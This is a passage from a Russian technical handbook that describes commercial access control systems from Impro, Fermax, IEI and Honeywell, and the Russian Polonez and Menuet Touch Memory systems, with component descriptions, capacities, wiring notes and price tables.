> VTP03RU078 — ключ, монтируемый на автомобиле (питание+ 24 В);

> VTP04RU100 — ключ, монтируемый на автомобиле (питание+ 12... 24 В).

Так как считыватель излучает электромагнитные колебания, то он может быть установлен на внутренней поверхности стены, чем достигается скрытность системы и ее защищенность. Стена может быть выполнена из любого строительного материала, кроме металла. В случае, если стена, за которой устанавливается считыватель, оказывается слишком толстой или изготовлена из металла (содержит металлическую арматуру), считыватель может быть вынесен наружу на расстояние до 25 м от основного блока. Разновидности считывателей и их особенности приведены в табл. 2. 3.

Ввод и регистрация новых ключей и карточек, а также исключение их из списка осуществляется с помощью специальной мастер-карты. При подключении к считывателю принтера можно распечатать массив зарегистрированных

Таблица 2.3. Разновидности считывателей жетонов и их особенности

Тип считывателя

Технические характеристики

RIN01RU100

Считыватель в стандартном корпусе

RMR01RU100

Считыватель во всепогодном, вандалостойком корпусе

RPC01RU100

Считыватель в брызгозащитном, вандалостойком корпусе

RPU01RU100

Считыватель в водозащитном, вандалостойком корпусе (с блоком настройки RPU02RU)

RPU02RU

Блок настройки для RPU01RU100

RWG01RL100

Считыватель в декоративном корпусе (под дерево)

RDT01RU100

Считыватель с индикацией времени и даты

RIR40RU100

Считыватель для установки в стандартной соединительной коробке диаметром 40 мм

RIRSORU100

Считыватель для установки в стандартной соединительной коробке диаметром 50 мм


кодов, а также список кодов, по которым осуществлялся проход в последнее время. Подключение к считывателю компьютера упрощает редактирование кодов ключей, а также позволяет осуществлять контроль конкретной двери с указанием даты и времени прохода.

Фирма Impro Technologies выпускает несколько разновидностей бесконтактных систем доступа. Состав этих систем и их назначение приведены в табл. 2. 4.

Таблица 2. 4. Бесконтактные системы ограничения доступа фирмы Impro Technologies

Тип системы

Технические характеристики

Цена, USD

FLEX-SCANCLASSC

FSC01RU100

Считывание до 20 жетонов к управление одной дверью в одном направлении

289

FSC02RU100

Считывание до 200 жетонов и управление одной дверью в одном направлении

329

FSC03RU100

Считывание до 2000 жетонов и управление одной дверью в одном направлении

399

FSP01RU

Программное обеспечение (редактирование жетонов, изменение параметров, контроль помещений)

FSW01

Кабель длиной 1 м для подключения к компьютеру

20

FLEXI-SCANE

FSE01RU100

Контроллер открывания одной двери в одном направлении с помощью жетонов и клавиатуры; возможность подключения датчиков охранной сигнализации; выход на принтер

344

FSE02RU100

Контроллер открывания одной двери в одном направлении с помощью жетонов и клавиатуры; возможность подключения датчиков охранной сигнализации; выход на принтер Программирование с клавиатуры или с компьютера

414

FSE03RU100

Контроллер открывания одной двери в одном направлении с помощью жетонов и клавиатуры; возможность подключения датчиков охранной сигнализации; выход на принтер. Программирование с клавиатуры или с компьютера. Возможность подключения к компьютеру до 16 контроллеров (требуется модуль CV-02 RU-OM)

515

CV-02RU-OM

Преобразователь интерфейса RS232/RS485

90

FSE04RU100

Считыватель до 2000 жетонов; управление с клавиатуры

136

MULTI-SCAN IV

MSC01RU100

Локальный контроллер для управления 4 дверьми

400

MC02RU100

Сетевой контроллер (объединение до 16 контроллеров с возможностью управления 64 дверьми)

400

MSD01RU100

Терминал с возможностью контроля прохода в обоих направлениях

600

MSD02RU100

Терминал с возможностью контроля прохода в обоих направлениях; управление с клавиатуры

676

MSS01RU100

Терминал с возможностью контроля прохода в обоих направлениях

300

MSS02RU100

Терминал с возможностью контроля прохода в обоих направлениях; управление с клавиатуры

376

MSI01RU100

Считыватель жетонов

106

MSI02RU100

Считыватель жетонов; управление с клавиатуры

182



Окончание таблицы 2. 4

Тип. системы

Технические характеристики

Цена, USD

MSP01RU

Программное обеспечение в комплекте с преобразователем интерфейса CV-02 RU-OM

360

LINK-SCAN

LSC01RU100

Сетевой контроллер (до 2000 жетонов)

748

LSC02RU100

Сетевой контроллер (до 8000 жетонов)

998

LST01RU100

Сетевой терминал

606

TNC01RU100

Сетевой коммуникатор (без возможности редактирования жетонов)

530

LSP20RU100

Программное обеспечение (до 2000 жетонов)

1008

LSP80RU100

Программное обеспечение (до 8000 жетонов)

1080

TSP20RU

Программное обеспечение (с использованием сетевых коммуникаторов)

1208


Рис. 2.16. Внешний вид считывателей и жетонов фирмы Impro Technologies

Изображение: 

2. 2. 7. Системы ограничения доступа компании Fermax.

2. 2. 7. Системы ограничения доступа компании Fermax

Для систем ограничения доступа компания Fermax (Испания) производит оборудование двух типов: локальные системы и цифровые многозоновые системы.

В локальных системах ограничение доступа осуществляется с помощью считывающего устройства и ключа, по предъявлению которого и осуществляется непосредственный доступ. В качестве ключа могут быть использованы бесконтактная идентификационная карта, ключ-кнопка или цифровая клавиатура. Считыватели могут программироваться во время использования или заблаговременно. Они предназначены для открывания дверей, снабженных электронными замками. При отсутствии идентификации система формирует сигнал тревоги. Локальная система — это удобство и безопасность за сравнительно низкую цену.

Цифровые многозоновые системы включают в свой состав необходимое количество локальных систем и осуществляют их взаимодействие. Цифровые системы, кроме свойств локальных систем, обладают также такими возможностями, как определение неисправных зон, разграничение зон по времени, разрешение доступа и фиксирование времени, даты и кода доступа.

Локальная система на основе бесконтактных идентификационных карточек

Эта система предназначена для организации ограничения доступа в офисы, квартиры, гаражи и другие помещения. Она прочна, легка в установке, проста в использовании, что весьма немаловажно при ее монтаже в гимнастических залах, спортивных аренах, концертных залах и галереях, в частных клубах и в других местах, где необходимо осуществлять контроль доступа в помещение.

В состав локальной системы входят:

> бесконтактная идентификационная карточка;

> Считыватель;

> устройство для программирования;

> - источник питания;

> дверной электронный замок.

Бесконтактная идентификационная карточка по своим размерам напоминает кредитную, магнитную или таксофонную карточку (рис. 2. 17). Она не требует встроенного источника питания и проста в обслуживании.

2-2-71.jpg

Рис. 2. 17 Идентификационная бесконтактная карточка

Каждая карточка имеет уникальный код, предотвращающий возможность его копирования. Все карточки имеют узкую магнитную полоску для дополнительного применения. При необходимости карточка может находиться внутри бумажника — нет надобности вынимать ее, чтобы открыть дверь. Достаточно поднести бумажник к считывателю, который производит идентификацию карточки, на расстоянии до 8 см.

Считыватель состоит из считывающего устройства и контроллера, объединенных в одном корпусе (рис. 2. 18), и может устанавливаться как снаружи, так и внутри помещения.

2-2-72.jpg

Рис. 2. 18 Считыватель бесконтактных карточек

Корпус считывателя имеет ударопрочную конструкцию, предохраняющую устройство от постороннего вмешательства. Открывание двери сопровождается включением зеленого светодиода на передней панели считывателя и звуковым сигналом. Контроллер считывателя способен идентифицировать до 475 идентификационных карточек-ключей.

Устройство для программирования (программатор) карточек-ключей и контроллера считывателя (рис. 2. 19) не является обязательным для локальной

2-2-73.jpg

Рис. 2. 19 Программатор карточек-ключей и контроллера считывателя

системы ограничение доступа. Его рекомендуется использовать только для улучшения сервисных возможностей локальной системы.

Программатор используется только в том случае, когда необходимо запрограммировать новую идентификационную карточку-ключ или удалить из памяти контроллера считывателя код утерянной карточки.

Для питания системы используются два типа источников питания (рис. 2. 20). Основной источник питания (справа на рисунке) рассчитан на ток нагрузки до 1, 5 А и постоянное напряжение 12 В. Его корпус выполнен из огнеупорного ударопрочного материала. Резервный источник питания имеет те же самые характеристики, что и основной. Он предназначен для питания системы при отключении основного источника и в автономном режиме работы системы обеспечивает не менее 400 срабатываний замка.

2-2-74.jpg

Рис. 2. 20. Источники питания локальной системы

Локальные системы компании Fermax работают с различными открывающими устройствами, например с автоматическими гаражными воротами или турникетами.

Схема подключения локальной системы представлена на рис. 2. 21. Основные характеристики локальной системы:

> обслуживает до 175 пользователей;

> имеет дистанционное управление замками с помощью кнопки;

> осуществляет управление открыванием дверей;

2-2-75.jpg

Рис. 2. 21. Схема подключения локальной системы

> программируемое время разрешения доступа;

> исключает возможность копирования карточек;

> использует считыватель, пригодный для внутреннего и наружного приме нения, выполненный в ударопрочном и огнеупорном корпусе;

> позволяет считывать код карточки на расстоянии до 8 см.

Локальная система с использованием технологии компании Dallas

Система предназначена для организации ограничения доступа в офисы, на стоянки или в лифты. Система активизируется, в отличие от описанной выше, только при контакте кодового ключа со считывателем.

Для организации системы ограничения доступа с использованием контактного кодового ключа необходимы следующие устройства:

> электронный кодовый ключ;

> контактный считыватель;

> контроллер;

> программатор;

> источник питания.

Электронный кодовый ключ выполнен по технологии компании Dallas. В ударопрочном и влагозащищенном корпусе, оформленном в виде брелка (рис. 2.22), содержатся литиевая батарейка и микросхема памяти с уникальным идентификационным кодом, защищенным от копирования,

Рис.2.22.Электронный кодовый ключ

2-2-76.jpg

Контактный считыватель (рис. 2. 23) предназначен для считывания кода электронного кодового ключа. Он выполнен в виде платы, помещенной в высокопрочный металлический корпус.

2-2-77.jpg

Рис. 2.23 Контактный считыватель

Для открывания одной или нескольких дверей считыватели могут соединяться параллельно в единую систему. Управление системой может быть организовано по замкнутому циклу с помощью контроллера (рис. 2. 24). Коды ключей заносятся, хранятся в его памяти и используются для идентификации кодовых ключей пользователей. Система позволяет обслуживать до 680 кодовых ключей.

2-2-78.jpg

Рис. 2. 24 Контроллер для организации управления системой по замкнутому циклу

Программатор системы (рис. 2.25) выполнен в виде отдельного блока. Он предназначен для первоначального программирования и последующего обслуживания системы. Программирование контроллера может быть произведено вручную или с помощью персонального компьютера. Доступ к программатору осуществляется с помощью мастер-ключа, который входит в состав системы и не может быть подделан. Мастер-ключ выполняет функции, аналогичные мастер-картам.

2-2-79.jpg

Рис. 2.25 Программатор системы

2-2-710.jpg

Рис. 2.26. Схема подключения локальной системы

В данной локальной системе используются точно такие же источники питания, как и в рассмотренной выше.

Система может работать с различными запорными устройствами. Схема подключения локальной системы приведена на рис. 2. 26. Характеристики локальной системы, использующей технологию Dallas:

> обслуживает до 680 пользователей;

> проводное дистанционное управление дверьми с помощью кнопки;

> возможность параллельного подключения двух считывателей;

> осуществляет контроль за открыванием дверей с включением сигнала

тревоги;

> программируемые время разрешения доступа и длительность звучания

сирены;

> проста в налаживании и установке;

> возможность ручного и автоматического программирования;

> обеспечивает доступ к программатору с помощью мастер-ключа;

> не позволяет копирование кодовых ключей;

> имеет возможность внешней и внутренней установки считывателей.

Локальная система с использованием устройства набора кода

Эта система предназначена для использования в коттеджах, дачах и других помещениях, где необходимо ограничивать доступ. Доступ осуществляется путем ввода с клавиатуры цифрового кода, который может состоять из 4—6 цифр. Открывание и закрывание замка двери сопровождается звуковым и световым

cигналами. При необходимости для повышения степени надежности системы возможно использование вторичного кода, набираемого после основного. Система включает в себя электронное устройство набора цифрового кода (клавиатуру), контроллер, источник питания и электронный дверной замок.

Устройство набора цифрового кода (рис. 2. 27) выполняет функцию считывания кодов нажимаемых клавиш и ввода их в контроллер, обеспечивающий идентификацию кодов пользователей и разрешение или ограничение доступа в помещение. Устройство набора кода выполнено на плате, помещенной в ударопрочный корпус, на внешней стороне которого размещаются клавиши клавиатуры.

2-2-711.jpg

Рис. 2. 27 Устройство набора цифрового кода

Два устройства набора цифрового кода могут подключаться параллельно при установке одного снаружи, а другого внутри помещения, или на разных входах в помещение. Каждое устройство позволяет вводить два кодовых слова, состоящих из 4 — 6 цифр каждое, и имеет два выхода для управления исполнительными устройствами и передачи сигнала тревоги на контроллер.

Контроллер (рис. 2. 28) предназначен для управления всей системой, обработки вводимых с клавиатуры кодов и их идентификации.

2-2-712.jpg

Рис.2.28 Контроллер системы

Контроллер выполнен на отдельной плате, размещенной в металлическом корпусе, и устанавливается - внутри охраняемого помещения. Для питания локальной системы также используются два вида источников питания: основной и резервный, их характеристики были приведены выше. Схема подключения системы представлена на рис. 2. 29

2-2-713.jpg

Рис. 2. 29. Схема подключения локальной системы

Основные характеристики локальной системы, использующей устройства набора кода:

> использование встроенной микропроцессорной системы;

> использование двух независимых временных зон;

> отображение программируемого кода по инициативе пользователя;

> параллельное подключение нескольких устройств набора кода;

> простой монтаж и настройка;

> установка клавиатуры внутри и (или) снаружи помещения.

Цифровая многозоновая система ограничения доступа

Когда контроль доступа необходимо осуществить в разных по значимости помещениях или в различное время суток, локальной системы становится недостаточно и возникает необходимость в использовании многозоновой цифровой системы. Центральный пульт многозоновой системы может управлять одновременно 32 локальными системами, при этом для идентификации могут применяться любые известные устройства ввода (считывания), используемые в простых локальных системах, как это показано на рис. 2. 30.

Периферийные устройства, такие как считыватели, клавиатуры, замки и т. п., могут использоваться в различных комбинациях и конфигурациях.

Цифровой контроллер делает возможным запись происшествий и событий, в том числе и выборочно, с целью дальнейшей их обработки. Он может наблюдать за различными тревожными датчиками и в случае их срабатывания действовать в соответствии с заложенной программой. Контроллер позволяет идентифицировать до 10 групп пользователей и обрабатывать поступающую информацию для каждой из групп в установленном формате: правильность доступа, день недели, временная зона (т. е. время, в течение которого разрешен доступ). Каждая

2-2-714.jpg

Рис. 2. 30. Многозоновая цифровая система

группа имеет свое имя и код для доступа в соответствующее помещение. Система поддерживает до 1020 пользователей. Для выполнения системой своих функций центральный пульт управления должен содержать следующие блоки и модули: центральный блок и источник питания, выходной модуль, модуль памяти, управляющий модуль, модуль сигнала тревоги.

Центральный пульт предназначен для объединения всех модулей управления с помощью процессорного устройства (CPU). Кроме CPU, блок содержит

2-2-715.jpg

Рис. 2.31 Центральный пульт управления

интерфейсы считывателей, стабилизатор напряжения и источник резервного питания. Блок размещается в металлическом ударопрочном корпусе (рис. 2. 31) и устанавливается на стене.

Центральный пульт объединяет в себе все основные и сменные модули, необходимые для монтажа системы. Он управляет всеми этими модулями во время работы.

Выходной модуль предназначен для включения электронных дверных замков при поступлении на него сигнала разрешения доступа и номера двери. Модуль выполнен в виде отдельной платы (рис. 2. 32), на которой расположены 8 электронных реле и схема управления.

2-2-716.jpg

Рис. 2.32 Выходной модуль открывания дверей

Каждый выходной модуль позволяет управлять 8 дверными замками. В центральном блоке имеется возможность установки 4 таких модулей, что позволяет осуществлять доступ в 32 помещения.

Модуль памяти предназначен для записи, считывания и хранения служебной информации. Он выполнен на отдельной плате (рис. 2. 32), выпускаемой в зависимости от количества пользователей в двух модификациях: на 254 или на 1020 ячеек. В последних хранится информация следующего содержания: имя пользователя, номер группы и код доступа.

2-2-717.jpg

Рис. 2. 33 Модуль памяти

Источник питания предназначен для снабжения центрального пульта управления и периферийных устройств постоянным током до 4 А и напряжением+ 12 В, а также для преобразования входного переменного напряжения 80—270 В в напряжение+ 12 В и его стабилизации. Источник питания выполнен в ударопрочном огнеупорном корпусе (рис. 2. 34).

2-2-718.jpg

Рис. 2. 34 Источник питания

 

2-2-719.jpg

Рис. 2.35 Управляющий модуль

Програмирование системы удобно проводить с помощью клавиатурного считывателя с дисплеем. Если считыватели такого типа не используются в конфигурации системы или количество пользователей велико, а также для удобства программирования используется управляющий модуль, входящий в состав центрального пульта. Этот модуль позволяет выдавать на персональный компьютер обобщенную информацию, поступающую со считывателей: разрешение доступа, увеличение или уменьшение контролируемых входов, их модификацию и др.

При необходимости для регистрации происходящих событий в масштабе реального времени модулю может быть подключен принтер, а для передачи информации по каналам связи — модем.

2-2-720.jpg

Рис. 2.36 Модуль сигналов тревоги

Модуль сигналов тревоги предназначен для обработки тревожных сигналов, приходящих с датчиков различного типа. Он выполнен в виде отдельной платы со стандартным разъемом (рис. 2. 36).

Модуль сигнала тревоги обеспечивает функционирование системы, в которой используется центральный пульт с тремя зонами охраны (каждый центральный блок позволяет объединять до 4 модулей).

В цифровой многозоновой системе могут быть использованы считыватели различных типов, в том числе и те, что используются в локальных системах.

Считыватели идентификационных карточек (рис. 2. 37) позволяют использовать специальные идентификационные карточки с уникальным кодом, предотвращающим возможность его копирования.

2-2-721.jpg

Считывание идентификационного кода карточки осуществляется за время менее 1 с. Считыватель прост в использовании. Контактные считыватели, также как и в локальных системах, используют технологию компании Dallas (рис. 2. 38). Считывание кода происходит при касании считывателя кодовым ключом.

2-2-722.jpg

Рис. 2. 38 Контактный считыватель

Код, записанный в микросхеме памяти карточки, защищен от копирования. Устройство набора цифрового кода с дисплеем предназначено для считывания и отображения набираемых с помощью клавиатуры кодов и передачи их на центральный пульт, который обеспечивает разрешение доступа при вводе кодов, состоящих из 4—6 цифр и зарегистрированных в памяти контролера и системы (рис. 2.39).

2-2-723.jpg

Рис. 2.39 Устройство набора цифрового кода с дисплеем

На дисплее отображается текущее время и дата, которые фиксируются в памяти устройства при наборе кода и выводятся на принтер или компьютер вместе с кодом доступа.

Нажатие клавиш сопровождается тональным звуковым сигналом, а номер нажатой клавиши клавиатуры выводится на дисплей для контроля набора или коррекции кода. Устройство набора цифрового кода может быть использовано для программирования всей системы.

Электронное устройство набора кода, аналогичное используемым в локальных системах (рис. 2. 40), позволяет вводить код доступа нажатием от 4 до 6 цифр. Код может состоять из двух кодовых слов.

2-2-724.jpg

Рис. 2.40 Клавиатурный считыватель

Нажатие клавиш сопровождается звуковым тональным сигналом. В случае ввода неразрешенного кода выдается сигнал другой тональности. На рис. 2. 41 представлена схема использования цифровой многозоновой системы.

Соединение считывателей с центральным блоком осуществляется двухжильным проводом сечением не менее 0, 45 мм2, соединение центрального блока и дверных замков — двухжильным проводом сечением не менее 1 мм2.

Цифровая многозоновая система может быть использована совместно с видео- и аудиосистемами охраны, наблюдениями и ограничения доступа в любой конфигурации.

2-2-725.jpg

Рис. 2. 41. Схема использования цифровой многозоновой системы

Рис. 2.17 Идентификационная бесконтактная карточка

Изображение: 

Рис. 2.18 Считыватель бесконтактных карточек

Изображение: 

Рис. 2.19 Программатор карточек-ключей и контроллера считывателя

Изображение: 

Рис. 2.20. Источники питания локальной системы

Изображение: 

Рис. 2.21. Схема подключения локальной системы

Изображение: 

Рис. 2.23 Контактный считыватель

Изображение: 

Рис. 2.24 Контроллер для организации управления системой по замкнутому циклу

Изображение: 

Рис. 2.25 Программатор системы

Изображение: 

Рис. 2.26. Схема подключения локальной системы

Изображение: 

Рис. 2.27 Устройство набора цифрового кода

Изображение: 

Рис. 2.28 Контроллер системы

Изображение: 

Рис. 2.29. Схема подключения локальной системы

Изображение: 

Рис. 2.30. Многозоновая цифровая система

Изображение: 

Рис. 2.31 Центральный пульт управления

Изображение: 

Рис. 2.32 Выходной модуль открывания дверей

Изображение: 

Рис. 2.33 Модуль памяти

Изображение: 

Рис. 2.34 Источник питания

Изображение: 

Рис. 2.35 Управляющий модуль

Изображение: 

Рис. 2.36 Модуль сигналов тревоги

Изображение: 

Рис. 2.37 Считыватель бесконтактных карточек

Изображение: 

Рис. 2.38 Контактный считыватель

Изображение: 

Рис. 2.39 Устройство набора цифрового кода с дисплеем

Изображение: 

Рис. 2.40 Клавиатурный считыватель

Изображение: 

Рис. 2.41. Схема использования цифровой многозоновой системы

Изображение: 

Рис.2.22. Электронный кодовый ключ

Изображение: 

2. 2. 8. Системы ограничения доступа фирмы International Electronics Inc.

2. 2. 8. Системы ограничения доступа фирмы International Electronics Inc.

Фирма International Electronics Inc. (IEI) производит системы охраны и ограничения доступа на основе последних достижений науки и техники. Основным элементом этих систем является HUB-контроллер. Существует несколько разновидностей систем ограничения доступа, различающихся по своему назначению.

2-2-81.jpg

Рис. 2.42. Состав оборудования автономной системы контролера доступа серии Door Card Self-Contained Access Control.

2-2-82.jpg

Рис. 2.43. Состав оборудования системы Command 8 Control Series

Устройства этой серии (рис. 2. 44) обладают всеми возможностями приведенных выше систем.

Однако, в отличии от них, функции управления этой системы сосредоточены в отдельном модуле, размещенном, как правило, вне досягаемости пользователей. Этот модуль и называют HUB-контроллером (рис. 2. 45).

2-2-83.jpg

Рис .2.44 Устройства ограничения доступа Secured S Series

2-2-84.jpg

Рис. 2/45 HUB- контроллер

Программирование системы осуществляется как непосредственно с клавиатуры HUB-контроллера, так и с персонального компьютера, обеспечивая, таким образом, возможность гибкого конфигурирования системы под конкретные условия использования. Существует также возможность дистанционного программирования контроллера при помощи модема.

Конфигурация системы, использующей HUB-контроллер, представлена на рис. 2. 46.

2-2-85.jpg

Рис. 2. 46. Конфигурация системы на основе HUB-контроллера

Особенности HUB-контроллера:

> вся управляющая электроника находится в отдельном блоке;

> обслуживает до 500 пользователей;

> работает с двумя считывателями;

> имеет часы реального времени;

> содержит буфер данных на 1000 событий;

> имеет И К выход для передачи информации на беспроводной принтер;

> имеет коммуникационный порт RS-232 (1200 бод) для связи с компьютером;

> реализует функцию «ввод кода под принуждением»;

> поддерживает 8 временных зон;

> может работать по расписанию для одной из 8 зон;

> поддерживает возможность работы в сети;

> имеет кнопку дистанционного управления замком;

> содержит программируемые по временному интервалу 4 выхода управления;

> предусмотрена возможность дистанционного управления с помощью модема.

Выходные реле блока управляют замком и включают звуковую или световую сигнализацию при взломе двери, при оставлении ее открытой и при попытке блокирования охраняемой зоны.

При монтаже расстояние от контроллера до считывателя или от контроллера до контроллера не должно превышать 30 м при двухпроводной линии, а при использовании экранированного кабеля — 150 м.

Основное реле контроллера коммутирует ток до 5 А, остальные — до 1 А при напряжении +24 В.

Фирма IEI производит весь спектр дополнительного оборудования для вышеперечисленных устройств (рис. 2. 47): программное обеспечение для Secured Series, инфракрасный принтер, блок питания в корпусе или без него, магнитные или бесконтактные карты, электронные ключи и многое другое.

2-2-86.jpg

Рис. 2. 47. Дополнительные устройства фирмы IEI

Рис .2.44 Устройства ограничения доступа Secured S Series

Изображение: 

Рис. 2.42. Состав оборудования автономной системы контролера доступа серии Door Card Self-Contained Access Control.

Изображение: 

Рис. 2.43. Состав оборудования системы Command 8 Control Series

Изображение: 

Рис. 2.45 HUB- контроллер

Изображение: 

Рис. 2.46. Конфигурация системы на основе HUB-контроллера

Изображение: 

Рис. 2.47. Дополнительные устройства фирмы IEI

Изображение: 

2. 2. 9. Система идентификационных карточек Excel Photo ID.

2.2.9. Система идентификационных карточек Excel Photo ID

Система Excel Photo ID фирмы Honeywell Inc. (США) использует идентификационные карточки с фотографическими изображениями, обеспечивает их изготовление, обработку и хранение в удобной для использования базе данных. Особенности системы:

> проста в использовании и обучении;

> поддержка усовершенствованных цифровых технологий сканирования и сжатия изображений;

> соответствие стандарту качества.

Система Excel Photo ID позволяет получить цветные идентификационные карточки с фотографиями (рис. 2. 48) и хранить изображения в графической базе данных. Она может производить поиск необходимых данных, обновлять информацию, заново печатать карточки, формировать отчеты и отслеживать изменения информации о персонале. Система проста в обслуживании. Даже начинающий пользователь компьютера уже через несколько минут работы может научиться самостоятельно изготавливать высококачественные идентификационные карточки. Изображения и подписи подвергаются сжатию с использованием улучшенных алгоритмов и хранятся вместе с информацией о владельце карточки.

2-2-91.jpg

Рис. 2. 48. Удостоверение с фотографией, изготовленное с помощью системы Excel Photo ID

Система создана по принципу открытых систем, она совместима с несколькими промышленными стандартами и имеет соответствующие интерфейсы, что обеспечивает более широкий выбор аппаратных средств и оправдывает вложенные в нее средства при постоянном развитии техники. Она совместима с большинством моделей плат обработки изображений и принтеров, а также поддерживает карточки любых форматов, обеспечивает связь по сети между компьютером главной рабочей станции обработки изображений и рабочими местами просмотра изображений.

База данных настраивается на конкретного потребителя. По желанию можно добавлять или удалять поля записей и изменять стандартное размещение информации на экране, что позволяет сделать базу данных по-настоящему индивидуальной. Благодаря использованию оболочки Windows, сбор и обновление информации о сотрудниках производится быстро и легко. Внешний вид идентификационных карточек и размер изображения можно изменить по желанию пользователя.

Система позволяет перемещать базу данных Excel Photo ID в другую компьютерную систему в стандартном формате ASCII, что дает возможность использовать эту информацию для всей организации или предприятия. Она имеет встроенную интерактивную подсказку (Help), что уменьшает расходы на обучение персонала.

Система позволяет контролировать возможность просмотра и изменения базы данных при помощи процедуры регистрации пользователя на каждом компьютере системы. Каждому пользователю присваивается идентификатор и пароль, благодаря которым он получает индивидуальные права доступа.

Система Excel Photo ID поддерживает сети промышленных стандартов:

локальную сеть Ethernet и сетевой протокол TCP/IP. Это наиболее распространенные сетевые стандарты, благодаря поддержке которых система Excel Photo ID может подключаться к существующим локальным и глобальным информационным сетям. Предусмотрена возможность пакетной печати.

Системы Excel Photo ID могут быть объединены через локальную или глобальную информационную сеть с системой ограничения доступа и охраны Honeywell, Excel Security Manager (XSM R515). Изображения, полученные в системе Excel Photo ID, могут просматриваться на рабочих местах операторов XSM.

Система предоставляет стандартные формы отчетов: список сотрудников, включая фотографии; статус изменения карточек; операции в системе; статус базы данных. Имеется возможность создавать свои собственные отчеты, используя информацию о владельцах карточек, изображения, информацию о действиях операторов и конфигурации системы.

Предусмотрено множество различных способов для легкого и быстрого поиска в базе данных конкретного владельца карточки. Поиск может производиться с использованием полей ключей, по имени и фамилии владельца карточки из списка или путем просмотра ряда уменьшенных изображений.

Система Excel Photo ID поддерживает практически неограниченное количество рабочих мест, принтеров, вариантов оформления карточек, размеров карточек, полей записей базы данных, отчетов. Она обеспечивает возможность использования устройств обработки изображений, обладающих наилучшим разрешением, за счет поддержки интерфейса управления средствами мультимедиа (MCI) системы Windows и интерфейса Twain.

Высококачественные изображения, как правило, при хранении занимают большой объем дискового пространства. За счет использования улучшенного метода сжатия изображения и формата FIF с регулируемым коэффициентом сжатия, система Excel Photo ID позволяет максимально использовать имеющееся пространство на диске. Сжатие может выполняться несколькими путями: по запросу, автоматически во время захвата изображения, в назначенное время, при отсутствии обращений в течение определенного времени.

Кроме тех достоинств, что перечислены выше, система Excel Photo ID позволяет использовать ее для изготовления таких документов, как:

> карточки сотрудников;

> удостоверения с фотографиями;

> удостоверения для бесплатного проезда в транспорте;

> студенческие билеты;

> водительские удостоверения;

> членские билеты;

> карточки медицинского страхования.

Систему также можно использовать для составления телефонных справочников, описей, для учета постоянных клиентов и т. д.

Рис. 2.48. Удостоверение с фотографией, изготовленное с помощью системы Excel Photo ID

Изображение: 

2.2.1. Автономная электронная система ограничения доступа "Полонез".

2.2.1. Автономная электронная система ограничения доступа «Полонез»

Система ограничения доступа «Полонез» основана на применении высоконадежных идентификационных карточек памяти типа Touch Memory, используемых в качестве карточек пользователей, а также в качестве мастер-карт программирования электронных замков. Применение технологии Touch Memory обеспечивает высокий уровень секретности (248 комбинаций кода), что делает практически невозможным подбор кода идентификатора, а неповторимость кода каждого идентификатора-ключа или карточки гарантируется производителем — фирмой Dallas Semiconductor (США).

Электронная карточка Touch Memory это:

> миниатюрное электронное устройство производства американской фирмы Dallas Semiconductor, содержащее микросхему памяти, размещенную в корпусе, надежно защищающем ее от воздействий внешней среды (рис. 2.8);

2-2-11.jpg

Рис. 2.8. Карточка Touch Memory.

> 48-разрядный уникальный код, записанный на кремниевый кристалл ла зерным методом и различные объемы постоянной и оперативной памяти;

> энергонезависимый таймер;

> персональный идентификатор, который используется для разграничения доступа через электронную проходную в помещения, а также к персональным компьютерам локальной вычислительной сети. Функциональные возможности системы «Полонез» следующие:

> поддержание дверей в запертом состоянии;

> автоматический контроль состояния дверей (звуковой сигнал, если дверь открыта);

> автоматическое отпирание замков владельцами зарегистрированных электронных карточек;

> дистанционное отпирание дверей с рабочих мест;

> переключение в режим свободного доступа в помещения в экстренных случаях;

> аварийное открывание дверей механическими ключами.

Зарегистрированными считаются идентификационные карточки или ключи, коды которых занесены в память блока электроники и дают право на проход в определенное помещение. В энергонезависимую память системы может быть занесено до 250 кодов карточек или ключей пользователей. В случае потери карточки нет необходимости менять замок. Код утерянной карточки навсегда удаляется из памяти системы.

Система подает звуковой сигнал при отпирании замка и напоминает пользователям о необходимости закрыть за собой дверь. Сигнал тревоги подается, если дверь была вскрыта несанкционированно. Выносная кнопка управления замком позволяет дистанционно отпирать дверь. Замок оснащен системой аварийного отпирания механическим ключом на случай перебоев в сети питания и может использоваться как надежный механический замок-защелка. Состав электронной системы ограничения доступа "Полонез" показан на рис. 2.9.

Система "Полонез" обеспечивает свободный доступ в помещения в часы приема посетителей. Предусмотрена возможность расширения системы путем использования программно-аппаратного комплекса "Полонез" для централизованного

2-2-12.jpg

Рис. 2.9 Состав системы «Полонез»: 1 — планка запорная косячная; 2 — электромеханический замок: 3 — блок электроники; 4 — кабель соединительный; 5 — шнур сетевой; 6 — кабель кнопки дистанционного управления; 7 — кнопка дистанционного управления замком

ведения списков пользователей системы, учета их персональных идентификаторов, назначения прав по доступу на компьютере с последующим переносом этих данных в память электроники системы.

Процесс занесения новых кодов карточек пользователей в память системы полностью автоматизирован. В системе, помимо пользовательских карточек, имеется специальная карточка, используемая для программирования функций системы и кодов пользователей, именуемая мастер-картой. Прикосновением этой мастер-карты и новой карточки к считывателю замка можно зарегистрировать эту карточку пользователя.

На случай, если пользователей очень много и система «Полонез» установлена в нескольких помещениях, предусмотрена возможность ведения списков на персональном компьютере. Для переноса списков пользователей из компьютера в память системы не требуется прокладывать к двери кабель или подключать к замку компьютер. Перенос списков пользователей с персонального компьютера в память системы осуществляется при помощи все той же карты Touch Memory.

Рис. 2.8. Карточка Touch Memory.

Изображение: 

Рис. 2.9 Состав системы «Полонез»: 1 — планка запорная косячная; 2 — электромеханический замок: 3 — блок электроники; 4 — кабель

Изображение: 

2.2.2. Компьютеризованный комплекс управления доступом "Менуэт".

2.2.2. Компьютеризованный комплекс управления доступом «Менуэт»

Комплекс "Менуэт" предназначен для управления доступом на объект в помещения с помощью электронных ключей (идентификационных карточек). Ограничение доступа осуществляется по коду электронной карты и по времени доступа с протоколизацией событий.

Функциональные возможности сетевого комплекса "Менуэт" следующие:

> поддержание дверей в запертом состоянии;

> контроль за состоянием дверей (звуковой сигнал, если дверь открыта);

> автоматическое отпирание замков владельцами зарегистрированных электронных карточек;

> разграничение доступа в помещения по времени;

> автоматизированное тестирование и ведение протокола функционирования системы;

> функционирование в режиме электронной проходной;

> автоматическое ведение и анализ журналов:

— проходов пользователей с указанием даты и времени прохода;

— попыток несанкционированных действий пользователей с указанием даты и времени нарушений;

— работы операторов и администраторов системы.

Автоматизированная система управления доступом в помещения «Менуэт» в качестве электронных ключей пользователей использует электронные идентификаторы Touch Memory.

В энергонезависимую память каждого блока электроники системы может быть занесено до 740 кодов карточек пользователей. Каждый код уникален!

2-2-21.jpg

Рис. 2.10. Идентификаторы Touch Memory

